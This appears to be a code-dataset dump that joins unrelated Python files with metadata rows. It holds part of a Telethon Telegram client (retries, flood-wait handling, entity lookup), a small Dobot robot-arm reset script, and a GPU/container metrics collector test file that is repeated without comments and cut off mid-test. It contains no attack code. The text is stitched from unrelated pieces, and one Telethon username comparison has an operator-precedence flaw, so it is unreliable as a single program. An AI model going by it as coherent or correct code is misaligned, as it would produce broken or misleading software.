await r.resolve(self, utils)
if r.CONSTRUCTOR_ID in self._flood_waited_requests:
due = self._flood_waited_requests[r.CONSTRUCTOR_ID]
diff = round(due - time.time())
if diff <= 3: # Flood waits below 3 seconds are "ignored"
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
elif diff <= self.flood_sleep_threshold:
__log__.info('Sleeping early for %ds on flood wait', diff)
await asyncio.sleep(diff, loop=self._loop)
self._flood_waited_requests.pop(r.CONSTRUCTOR_ID, None)
else:
raise errors.FloodWaitError(capture=diff)
request_index = 0
self._last_request = time.time()
for _ in range(self._request_retries):
try:
future = self._sender.send(request, ordered=ordered)
if isinstance(future, list):
results = []
for f in future:
result = await f
self.session.process_entities(result)
results.append(result)
request_index += 1
return results
else:
result = await future
self.session.process_entities(result)
return result
except (errors.ServerError, errors.RpcCallFailError) as e:
__log__.warning('Telegram is having internal issues %s: %s',
e.__class__.__name__, e)
except (errors.FloodWaitError, errors.FloodTestPhoneWaitError) as e:
if utils.is_list_like(request):
request = request[request_index]
self._flood_waited_requests\
[request.CONSTRUCTOR_ID] = time.time() + e.seconds
if e.seconds <= self.flood_sleep_threshold:
__log__.info('Sleeping for %ds on flood wait', e.seconds)
await asyncio.sleep(e.seconds, loop=self._loop)
else:
raise
except (errors.PhoneMigrateError, errors.NetworkMigrateError,
errors.UserMigrateError) as e:
__log__.info('Phone migrated to %d', e.new_dc)
should_raise = isinstance(e, (
errors.PhoneMigrateError, errors.NetworkMigrateError
))
if should_raise and await self.is_user_authorized():
raise
await self._switch_dc(e.new_dc)
raise ValueError('Number of retries reached 0')
# region Public methods
async def get_me(self, input_peer=False):
if input_peer and self._self_input_peer:
return self._self_input_peer
try:
me = (await self(
functions.users.GetUsersRequest([types.InputUserSelf()])))[0]
if not self._self_input_peer:
self._self_input_peer = utils.get_input_peer(
me, allow_self=False
)
return self._self_input_peer if input_peer else me
except errors.UnauthorizedError:
return None
async def is_user_authorized(self):
if self._self_input_peer is not None or self._state.pts != -1:
return True
try:
self._state = await self(functions.updates.GetStateRequest())
return True
except errors.RPCError:
return False
async def get_entity(self, entity):
single = not utils.is_list_like(entity)
if single:
entity = (entity,)
# Group input entities by string (resolve username),
# input users (get users), input chat (get chats) and
# input channels (get channels) to get the most entities
# in the less amount of calls possible.
inputs = []
for x in entity:
if isinstance(x, str):
inputs.append(x)
else:
inputs.append(await self.get_input_entity(x))
users = [x for x in inputs
if isinstance(x, (types.InputPeerUser, types.InputPeerSelf))]
chats = [x.chat_id for x in inputs
if isinstance(x, types.InputPeerChat)]
channels = [x for x in inputs
if isinstance(x, types.InputPeerChannel)]
if users:
# GetUsersRequest has a limit of 200 per call
tmp = []
while users:
curr, users = users[:200], users[200:]
tmp.extend(await self(functions.users.GetUsersRequest(curr)))
users = tmp
if chats: # TODO Handle chats slice?
chats = (await self(
functions.messages.GetChatsRequest(chats))).chats
if channels:
channels = (await self(
functions.channels.GetChannelsRequest(channels))).chats
# Merge users, chats and channels into a single dictionary
id_entity = {
utils.get_peer_id(x): x
for x in itertools.chain(users, chats, channels)
}
# We could check saved usernames and put them into the users,
# chats and channels list from before. While this would reduce
# the amount of ResolveUsername calls, it would fail to catch
# username changes.
result = []
for x in inputs:
if isinstance(x, str):
result.append(await self._get_entity_from_string(x))
elif not isinstance(x, types.InputPeerSelf):
result.append(id_entity[utils.get_peer_id(x)])
else:
result.append(next(
u for u in id_entity.values()
if isinstance(u, types.User) and u.is_self
))
return result[0] if single else result
async def get_input_entity(self, peer):
if peer in ('me', 'self'):
return types.InputPeerSelf()
try:
# First try to get the entity from cache, otherwise figure it out
return self.session.get_input_entity(peer)
except ValueError:
pass
if isinstance(peer, str):
return utils.get_input_peer(
await self._get_entity_from_string(peer))
if not isinstance(peer, int) and (not isinstance(peer, TLObject)
or peer.SUBCLASS_OF_ID != 0x2d45687):
# Try casting the object into an input peer. Might TypeError.
# Don't do it if a not-found ID was given (instead ValueError).
return utils.get_input_peer(peer)
raise ValueError(
'Could not find the input entity for "{}". Please read https://'
'telethon.readthedocs.io/en/latest/extra/basic/entities.html to'
' find out more details.'
.format(peer)
)
async def get_peer_id(self, peer, add_mark=True):
if isinstance(peer, int):
return utils.get_peer_id(peer, add_mark=add_mark)
try:
if peer.SUBCLASS_OF_ID in (0x2d45687, 0xc91c90b6):
# 0x2d45687, 0xc91c90b6 == crc32(b'Peer') and b'InputPeer'
return utils.get_peer_id(peer)
except AttributeError:
pass
peer = await self.get_input_entity(peer)
if isinstance(peer, types.InputPeerSelf):
peer = await self.get_me(input_peer=True)
return utils.get_peer_id(peer, add_mark=add_mark)
# endregion
# region Private methods
async def _get_entity_from_string(self, string):
phone = utils.parse_phone(string)
if phone:
for user in (await self(
functions.contacts.GetContactsRequest(0))).users:
if user.phone == phone:
return user
else:
username, is_join_chat = utils.parse_username(string)
if is_join_chat:
invite = await self(
functions.messages.CheckChatInviteRequest(username))
if isinstance(invite, types.ChatInvite):
raise ValueError(
'Cannot get entity from a channel (or group) '
'that you are not part of. Join the group and retry'
)
elif isinstance(invite, types.ChatInviteAlready):
return invite.chat
elif username:
if username in ('me', 'self'):
return await self.get_me()
try:
result = await self(
functions.contacts.ResolveUsernameRequest(username))
except errors.UsernameNotOccupiedError as e:
raise ValueError('No user has "{}" as username'
.format(username)) from e
for entity in itertools.chain(result.users, result.chats):
if getattr(entity, 'username', None) or '' \
.lower() == username:
return entity
try:
# Nobody with this username, maybe it's an exact name/title
return await self.get_entity(
self.session.get_input_entity(string))
except ValueError:
pass
raise ValueError(
'Cannot find any entity corresponding to "{}"'.format(string)
)
async def _get_input_notify(self, notify):
try:
if notify.SUBCLASS_OF_ID == 0x58981615:
if isinstance(notify, types.InputNotifyPeer):
notify.peer = await self.get_input_entity(notify.peer)
return notify
except AttributeError:
return types.InputNotifyPeer(await self.get_input_entity(notify))
| true | true |
f72ead7d4b9e3e317119cf83ac6cb3d4a19f18ec | 340 | py | Python | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | examples/resetting_errors.py | MK8J/dobot-python | 3ce4a2a5d6e9ae5ab6d42546eab0228419e82e8e | [
"MIT"
] | null | null | null | '''
A script to try and reset from a stage error
without having to turn off the dobot
'''
import sys
import os
sys.path.append(os.path.abspath('..'))
import connecting
#connect
bot = connecting.connect()
bot.reset_pose(1,45,45) # 0 is false, will try to automatically reset?
bot.clear_alarms_state()
bot.serial.close()
#import homing
| 17 | 70 | 0.738235 | import sys
import os
sys.path.append(os.path.abspath('..'))
import connecting
bot = connecting.connect()
bot.reset_pose(1,45,45)
bot.clear_alarms_state()
bot.serial.close()
| true | true |
f72eadfc88eda868eba4d4b77c1b8a758b724676 | 18,817 | py | Python | src/docker-images/job-exporter/test/test_collector.py | jinlmsft/Apulis-AI-Platform | 2cf1fbb50e08b477940f5f336b1b897a49608b72 | [
"MIT"
] | 38 | 2020-07-13T08:46:39.000Z | 2021-02-08T01:38:44.000Z | src/docker-images/job-exporter/test/test_collector.py | debbie-alaine/DLWorkspace | 2888042c0f9388f911bc74fe5ecd20ef3fabd715 | [
"MIT"
] | null | null | null | src/docker-images/job-exporter/test/test_collector.py | debbie-alaine/DLWorkspace | 2888042c0f9388f911bc74fe5ecd20ef3fabd715 | [
"MIT"
] | 20 | 2020-07-14T03:38:50.000Z | 2021-01-08T06:24:17.000Z | # Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import sys
import unittest
import datetime
import time
import logging
import base
sys.path.append(os.path.abspath("../src/"))
import collector
import nvidia
import docker_inspect
from collector import ContainerCollector
from collector import GpuCollector
logger = logging.getLogger(__name__)
class TestContainerCollector(base.TestBase):
"""
Test ContainerCollector in collecotr.py
"""
def test_parse_from_labels(self):
inspect_result = docker_inspect.InspectResult(
"openmindstudio",
"trialslot_nnimain_d65bc5ac",
"tuner",
"0",
"this_is_pod_name_val",
"0,1,",
12345,
"dixu@example.com",
"platform",
False,
)
gpu_ids, labels = ContainerCollector.parse_from_labels(
inspect_result, None)
self.assertEqual(["0", "1"], gpu_ids)
target_labels = {
"username": "openmindstudio",
"job_name": "trialslot_nnimain_d65bc5ac",
"role_name": "tuner",
"task_index": "0",
"pod_name": "this_is_pod_name_val",
"user_email": "dixu@example.com",
"vc_name": "platform",
}
self.assertEqual(target_labels, labels)
def test_infer_service_name(self):
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8"
))
self.assertEqual(
"alertmanager",
ContainerCollector.infer_service_name(
"k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2"
))
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6"
))
class TestDockerCollector(base.TestBase):
"""
Test DockerCollector in collector.py
"""
def assert_metrics(self, metrics):
self.assertEqual(1, len(metrics))
self.assertEqual(1, len(metrics[0].samples))
sample = metrics[0].samples[0]
self.assertEqual(1, len(sample[1])) # label keys
self.assertEqual(1, sample[2]) # sample value
def test_impl(self):
_, c = collector.instantiate_collector("test_docker_collector1", 0.5,
datetime.timedelta(seconds=1),
collector.DockerCollector)
self.assert_metrics(c.collect_impl())
def test_base_collector(self):
""" actually setup DockerCollector thread, and test, since this is multi-thread
test case, maybe sensitive to the system load """
ref = collector.make_collector("test_docker_collector2", 0.5,
datetime.timedelta(seconds=10),
collector.DockerCollector)
metrics = None
for i in range(20):
metrics = ref.get(datetime.datetime.now())
if metrics is not None:
break
time.sleep(0.1)
self.assert_metrics(metrics)
class TestZombieCollector(base.TestBase):
"""
Test ZombieCollector in collector.py
"""
def setUp(self):
# Because prometheus forbid same metric name, and we generate metric
# in from name, we need to differentiate name using time.
t = str(time.time()).replace(".", "_")
decay_time = datetime.timedelta(seconds=1)
_, self.collector = collector.instantiate_collector(
"test_zombie_collector" + t, 0.5, decay_time,
collector.ZombieCollector, collector.AtomicRef(decay_time),
collector.AtomicRef(decay_time))
def test_update_zombie_count_type1(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
type1_recorder = self.collector.type1_zombies
self.assertEqual(
set(), self.collector.update_zombie_count_type1({"a", "b"}, start))
self.assertEqual(2, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{"a", "b"}, start + type1_recorder.decay_time - one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a", "b"},
self.collector.update_zombie_count_type1(
{"a", "b"},
start + type1_recorder.decay_time + one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a"},
self.collector.update_zombie_count_type1(
{"a"},
start + type1_recorder.decay_time + 2 * one_sec))
self.assertEqual(1, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{}, start + type1_recorder.decay_time + 3 * one_sec))
self.assertEqual(0, len(type1_recorder))
def test_update_zombie_count_type2(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
stats = {
"43ffe701d883": {
"name":
"core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002",
"id":
"43ffe701d883"
},
"8de2f53e64cb": {
"name": "container_e03_1539312078880_0780_01_000002",
"id": "8de2f53e64cb"
}
}
type2_recorder = self.collector.type2_zombies
self.assertEqual(set(),
self.collector.update_zombie_count_type2(stats, start))
stats.pop("8de2f53e64cb")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(stats, start + one_sec))
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time))
self.assertEqual({"43ffe701d883"},
self.collector.update_zombie_count_type2(
stats,
start + type2_recorder.decay_time + 2 * one_sec))
stats.pop("43ffe701d883")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time + 3 * one_sec))
class TestGpuCollector(base.TestBase):
"""
Test GpuCollector in collecotr.py
"""
def make_pid_to_cid_fn(self, mapping):
def fn(pid):
if pid in mapping:
return True, mapping[pid]
return False, ""
return fn
def test_convert_to_metrics(self):
# sample may not ordered, and can not assertEqual directly, so tear them apart
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
"GPU-uuid0", 37.0)
])
zombie_info = {"abc", "def"}
pid_to_cid_mapping = {33: "def", 22: "ghi"} # only 33 is zombie
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["0", "GPU-uuid0"], 20)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["0", "GPU-uuid0"], 21)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
target_external_process.add_metric(["0", "44"], 1)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
target_zombie_container.add_metric(["0", "def"], 1)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0)
self.assertEqual(target_gpu_temp, gpu_temp)
# test minor 1
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(
30, 31, [55, 123],
nvidia.EccError(volatile_single=2,
volatile_double=3,
aggregated_single=4,
aggregated_double=5), "1", "GPU-uuid1", 24.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["1", "GPU-uuid1"], 30)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["1", "GPU-uuid1"], 31)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
target_external_process.add_metric(["1", "55"], 1)
target_external_process.add_metric(["1", "123"], 1)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0)
self.assertEqual(target_gpu_temp, gpu_temp)
# test minor 2
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(),
"2", "GPU-uuid2", 30.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["2", "GPU-uuid2"], 40)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0)
self.assertEqual(target_gpu_temp, gpu_temp)
# test memory leak
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [],
nvidia.EccError(), "3", "GPU-uuid3", 30.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_mem_leak = collector.gen_gpu_memory_leak_counter()
target_mem_leak.add_metric(["3", "GPU-uuid3"], 1)
self.assertEqual(target_mem_leak, mem_leak)
def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self):
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
"GPU-uuid0", 40.0)
])
# zombie_info is empty should also have external process metric
zombie_info = []
pid_to_cid_mapping = {
33: "def",
22: "ghi"
} # only 44 is external process
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(0, len(zombie_container.samples))
self.assertEqual(1, len(external_process.samples))
self.assertEqual("0",
external_process.samples[0].labels["minor_number"])
self.assertEqual("44", external_process.samples[0].labels["pid"])
# zombie_info is None should also have external process metric
zombie_info = None
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(0, len(zombie_container.samples))
self.assertEqual(1, len(external_process.samples))
self.assertEqual("0",
external_process.samples[0].labels["minor_number"])
self.assertEqual("44", external_process.samples[0].labels["pid"])
def test_convert_to_metrics_with_real_id_BUGFIX(self):
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0",
"GPU-uuid0", 50.0)
])
# zombie_info is empty should also have external process metric
zombie_info = {"ce5de12d6275"}
pid_to_cid_mapping = {
22:
"ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356"
}
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(1, len(zombie_container.samples))
self.assertEqual("0",
zombie_container.samples[0].labels["minor_number"])
self.assertEqual("ce5de12d6275",
zombie_container.samples[0].labels["container_id"])
class TestAtomicRef(base.TestBase):
"""
Test AtomicRef in collecotr.py
"""
def test_expiration(self):
ref = collector.AtomicRef(datetime.timedelta(seconds=10))
now = datetime.datetime.now()
delta = datetime.timedelta(seconds=1)
ref.set(1, now)
self.assertEquals(1, ref.get(now))
self.assertEquals(1, ref.get(now - delta))
self.assertEquals(1, ref.get(now + delta))
self.assertEquals(1, ref.get(now + delta * 10))
self.assertEquals(None, ref.get(now + delta * 11))
self.assertEquals(1, ref.get(now + delta * 10))
ref.set(2, now + delta)
self.assertEquals(2, ref.get(now))
self.assertEquals(2, ref.get(now + delta * 10))
self.assertEquals(2, ref.get(now + delta * 11))
self.assertEquals(None, ref.get(now + delta * 12))
if __name__ == '__main__':
unittest.main()
| 38.718107 | 128 | 0.634905 |
import os
import sys
import unittest
import datetime
import time
import logging
import base
sys.path.append(os.path.abspath("../src/"))
import collector
import nvidia
import docker_inspect
from collector import ContainerCollector
from collector import GpuCollector
logger = logging.getLogger(__name__)
class TestContainerCollector(base.TestBase):
def test_parse_from_labels(self):
inspect_result = docker_inspect.InspectResult(
"openmindstudio",
"trialslot_nnimain_d65bc5ac",
"tuner",
"0",
"this_is_pod_name_val",
"0,1,",
12345,
"dixu@example.com",
"platform",
False,
)
gpu_ids, labels = ContainerCollector.parse_from_labels(
inspect_result, None)
self.assertEqual(["0", "1"], gpu_ids)
target_labels = {
"username": "openmindstudio",
"job_name": "trialslot_nnimain_d65bc5ac",
"role_name": "tuner",
"task_index": "0",
"pod_name": "this_is_pod_name_val",
"user_email": "dixu@example.com",
"vc_name": "platform",
}
self.assertEqual(target_labels, labels)
def test_infer_service_name(self):
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8"
))
self.assertEqual(
"alertmanager",
ContainerCollector.infer_service_name(
"k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2"
))
self.assertIsNone(
ContainerCollector.infer_service_name(
"k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6"
))
class TestDockerCollector(base.TestBase):
def assert_metrics(self, metrics):
self.assertEqual(1, len(metrics))
self.assertEqual(1, len(metrics[0].samples))
sample = metrics[0].samples[0]
self.assertEqual(1, len(sample[1]))
self.assertEqual(1, sample[2])
def test_impl(self):
_, c = collector.instantiate_collector("test_docker_collector1", 0.5,
datetime.timedelta(seconds=1),
collector.DockerCollector)
self.assert_metrics(c.collect_impl())
def test_base_collector(self):
ref = collector.make_collector("test_docker_collector2", 0.5,
datetime.timedelta(seconds=10),
collector.DockerCollector)
metrics = None
for i in range(20):
metrics = ref.get(datetime.datetime.now())
if metrics is not None:
break
time.sleep(0.1)
self.assert_metrics(metrics)
class TestZombieCollector(base.TestBase):
def setUp(self):
t = str(time.time()).replace(".", "_")
decay_time = datetime.timedelta(seconds=1)
_, self.collector = collector.instantiate_collector(
"test_zombie_collector" + t, 0.5, decay_time,
collector.ZombieCollector, collector.AtomicRef(decay_time),
collector.AtomicRef(decay_time))
def test_update_zombie_count_type1(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
type1_recorder = self.collector.type1_zombies
self.assertEqual(
set(), self.collector.update_zombie_count_type1({"a", "b"}, start))
self.assertEqual(2, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{"a", "b"}, start + type1_recorder.decay_time - one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a", "b"},
self.collector.update_zombie_count_type1(
{"a", "b"},
start + type1_recorder.decay_time + one_sec))
self.assertEqual(2, len(type1_recorder))
self.assertEqual({"a"},
self.collector.update_zombie_count_type1(
{"a"},
start + type1_recorder.decay_time + 2 * one_sec))
self.assertEqual(1, len(type1_recorder))
self.assertEqual(
set(),
self.collector.update_zombie_count_type1(
{}, start + type1_recorder.decay_time + 3 * one_sec))
self.assertEqual(0, len(type1_recorder))
def test_update_zombie_count_type2(self):
start = datetime.datetime.now()
one_sec = datetime.timedelta(seconds=1)
stats = {
"43ffe701d883": {
"name":
"core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002",
"id":
"43ffe701d883"
},
"8de2f53e64cb": {
"name": "container_e03_1539312078880_0780_01_000002",
"id": "8de2f53e64cb"
}
}
type2_recorder = self.collector.type2_zombies
self.assertEqual(set(),
self.collector.update_zombie_count_type2(stats, start))
stats.pop("8de2f53e64cb")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(stats, start + one_sec))
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time))
self.assertEqual({"43ffe701d883"},
self.collector.update_zombie_count_type2(
stats,
start + type2_recorder.decay_time + 2 * one_sec))
stats.pop("43ffe701d883")
self.assertEqual(
set(),
self.collector.update_zombie_count_type2(
stats, start + type2_recorder.decay_time + 3 * one_sec))
class TestGpuCollector(base.TestBase):
def make_pid_to_cid_fn(self, mapping):
def fn(pid):
if pid in mapping:
return True, mapping[pid]
return False, ""
return fn
def test_convert_to_metrics(self):
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
"GPU-uuid0", 37.0)
])
zombie_info = {"abc", "def"}
pid_to_cid_mapping = {33: "def", 22: "ghi"}
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["0", "GPU-uuid0"], 20)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["0", "GPU-uuid0"], 21)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0)
target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
target_external_process.add_metric(["0", "44"], 1)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
target_zombie_container.add_metric(["0", "def"], 1)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0)
self.assertEqual(target_gpu_temp, gpu_temp)
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(
30, 31, [55, 123],
nvidia.EccError(volatile_single=2,
volatile_double=3,
aggregated_single=4,
aggregated_double=5), "1", "GPU-uuid1", 24.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["1", "GPU-uuid1"], 30)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["1", "GPU-uuid1"], 31)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4)
target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
target_external_process.add_metric(["1", "55"], 1)
